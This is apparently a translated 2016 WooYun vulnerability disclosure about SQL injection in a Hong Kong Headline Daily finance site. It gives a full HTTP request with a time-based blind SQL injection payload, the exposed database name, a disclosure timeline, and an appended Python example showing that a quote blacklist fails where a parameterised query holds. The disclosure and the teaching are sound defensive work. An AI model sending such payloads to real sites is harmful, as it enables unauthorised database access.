Vulnerability summary

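Vulnerability ID: wooyun-2016-0166438

Title: SQL injection in 香港頭條日报 頭條財經網 (Headline Daily Hong Kong, Headline Finance site) (Hong Kong region)

Vendor: 頭條日报 (Headline Daily)

Author: 不败顽童

Submitted: 2016-01-01 15:45

Fixed: 2016-02-12 18:49

Disclosed: 2016-02-12 18:49

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (HKCERT, the Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or assistance, contact [email protected]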


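Vulnerability details

Disclosure status:

2016-01-01: Details sent to the vendor; awaiting vendor action
2016-01-04: Vendor confirmed; details disclosed to the vendor only
2016-01-14: Details disclosed to core white hats and experts in relevant fields
2016-01-24: Details disclosed to regular white hats
2016-02-03: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public

Brief description:

SQL injection in 香港頭條日报 頭條財經網 (Headline Daily Hong Kong, Headline Finance site)

Detailed description: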

GET /finVideo.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&pageNo=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

Proof of vulnerability:

Database: financeblog_uat
[79 tables]

Remediation:

Block special characters

Copyright notice: when reposting, please credit the source 不败顽童@乌云 (WooYun)
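
An added example, not part of the original report and not the vendor's code: the `id` value from the request above is run through a quote-stripping filter, then through an integer allow-list with a bound query parameter. Python and an in-memory SQLite table stand in for the site's PHP backend and database; the table, columns and function names are assumptions.

```python
import sqlite3
from urllib.parse import unquote

# `id` value copied from the request in this report (still URL-encoded).
REPORTED_ID = (
    "if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()"
    "%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/"
)

def reported_value():
    """The reported parameter as the application sees it after URL decoding."""
    return unquote(REPORTED_ID)

def strip_quotes(value):
    """Character blacklist: drop quotes and backslashes, keep everything else."""
    return value.translate(str.maketrans("", "", "'\"\\"))

def parse_id(raw):
    """Allow-list: a short run of ASCII digits becomes an int, anything else None."""
    if raw.isascii() and raw.isdigit() and len(raw) <= 10:
        return int(raw)
    return None

def make_db():
    """Constructed stand-in table; the site's real schema is not in the report."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE video (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO video VALUES (?, ?)", [(1, "clip one"), (2, "clip two")])
    return db

def fetch_video(db, raw_id):
    """Validate the parameter, then bind it; the SQL text itself never changes."""
    video_id = parse_id(raw_id)
    if video_id is None:
        return None  # the caller would answer HTTP 400 here
    row = db.execute("SELECT title FROM video WHERE id = ?", (video_id,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    decoded = reported_value()
    # The first branch of the reported value contains no quote characters,
    # so a quote blacklist leaves that expression untouched.
    print("after blacklist:", strip_quotes(decoded)[:30])
    print("allow-list     :", parse_id(decoded))
    db = make_db()
    print("id=1           :", fetch_video(db, "1"))
    print("reported value :", fetch_video(db, decoded))
```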


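Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2016-01-04 17:13

Vendor reply:

The relevant organization has been notified of the incident

Latest status:

None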

